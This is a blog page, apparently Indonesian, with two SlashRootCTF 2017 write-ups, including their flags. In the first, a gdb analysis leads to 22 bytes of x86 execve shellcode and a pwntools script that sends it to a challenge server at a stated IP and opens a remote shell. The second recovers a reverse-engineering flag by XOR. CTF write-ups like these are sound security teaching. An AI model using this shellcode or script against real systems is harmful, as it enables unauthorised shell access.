Showing posts with label Pemrograman. Show all posts
Showing posts with label Pemrograman. Show all posts

Saturday, June 17, 2017

Write Up SlashRoot - Gimme Something

Gimme Something (100pts)  Something special you can give to me.Connect: nc 103.200.7.150 7777  gimme_something  f6067d45d9e278f6913f8bddbd74f100 v Deskripsi Sama dengan soal sebelumnya kita diberikan akses ke server dan sebuah binary v Penyelesaian Pertama kita bongkar dengan ida namu ternyata fungsi run_it tidak dapat di psucode kita analisis dengan gdb. 0x08048531 <+100>: call   eax Kecurigaan terjadi pada address tersebut dan bagaimana caranya supaya kita bisa sampe ke address tersebut    0x08048509 <+60>: call   0x80483b0 <strlen@plt>    0x0804850e <+65>: cmp    eax,0x16 Dari address diatas panjang inputan kita harus sama dengan 0x16 = 22 berarti kita harus memiliki shell dengan panjang 22 bytes Mencoba mencari shell di http://shell-storm.org/shellcode kita coba dengan http://shell-storm.org/shellcode/files/shellcode-575.php kita tambahkan 1 bytes nopslide di awal sehingga menjadi \x90\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 Kita coba tes langsung ke server [+] Opening connection to 103.200.7.150 on port 7777: Done [*] Switching to interactive mode [x] Welcome to #SlashRootCTF2K17 [x] Glad to see you here, enjoy the CTF \m/... $ ls -alh total 52K drwxr-x--- 17 0 1000 4.0K Jun  9 09:40 . drwxr-x--- 17 0 1000 4.0K Jun  9 09:40 .. -rwxr-x---  1 0 1000  220 Aug 31  2015 .bash_logout -rwxr-x---  1 0 1000 3.7K Aug 31  2015 .bashrc -rwxr-----  1 0 1000   36 Jun  9 09:29 .flag -rwxr-x---  1 0 1000  655 Jun 24  2016 .profile drwxr-xr-x  2 0    0 4.0K Jun  9 09:40 bin drwxr-xr-x  2 0    0 4.0K Jun  9 09:40 dev -rwxr-x---  1 0 1000 7.3K Jun  9 09:29 gimme_shell drwxr-xr-x 32 0    0 4.0K Jun  9 09:40 lib drwxr-xr-x  3 0    0 4.0K Jun  9 09:40 lib32 drwxr-xr-x  2 0    0 4.0K Jun  9 09:40 lib64 $ cat .flag SlashRootCTF{stairway_to_sHELLcode} Script pwn kurang lebih seperti ini  from pwn import * context(arch = 'i386', os = 'linux') r = remote('103.200.7.150', 7777) r.send("\x90\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80\n") r.interactive() Flag untuk tantangan ini yaitu SlashRootCTF{stairway_to_sHELLcode} MicrosoftInternetExplorer402DocumentNotSpecified7.8 磅Normal0...

Write Up SlashRoot - Galatic

Galactic (100pts)  Hmm, saya kesulitan menemukan flagnya , bisa bantu saya temukan flagnya ?  galactic  7edc94694c73ec45f07cf81b21a2fd29 v Deskripsi Sama dengan soal rev4fun soal ini masih berkaitan dengan reverse engineering v Penyelesaian Dengan cara yang masih sama kita menggunakan gdb dan kita breakpoint pada address cmp dan ditambahkan dengan address xor 0x00000000004006b4 <+103>: xor    eax,ecx 0x00000000004006b6 <+105>: cmp    edx,eax 0x00000000004006d5 <+136>: cmp    eax,0xb Ok kita input dengan abcdefghijk 0x4006d5 <main+136>: cmp    eax,0xb 0x4006d8 <main+139>: jbe    0x400690 <main+67> Pada breakpoint pertama inputan kita di cek panjangnya kurang dari 11. Karena inputan kita kurang dari 11 maka langsung di jump proses xornya. Kita lihat di gdb. RAX: 0x61 ('a') RCX: 0x25 ('%') RDX: 0x57 ('W') 0x4006b4 <main+103>: xor    eax,ecx 0x4006b6 <main+105>: cmp    edx,eax Nampaknya hasil inputan kita di xor dengan rcx harus sama dengan rdx kita bisa mendapat inputan yang benar dengan rcx^rdx = rax ok mari kita lakukan. %&'()*+,-./0 xor WCQELGRN_[G\x11 = revmemybruh! Kita tes apakah benar itu inputannya ./galactic Enter flag : revmemybruh! Nice, here is your flag: SlashRootCTF{revmemybruh!} MicrosoftInternetExplorer402DocumentNotSpecified7.8 磅Normal0 Flag tantangan ini adalah SlashRootCTF{revmemybruh!} ...

Search This Blog

Powered by Blogger.

Langganan

Enter your email address:

Delivered by FeedBurner

 

© 2015 Learning Basic Network. All rights resevered. Designed by Templateism

Back To Top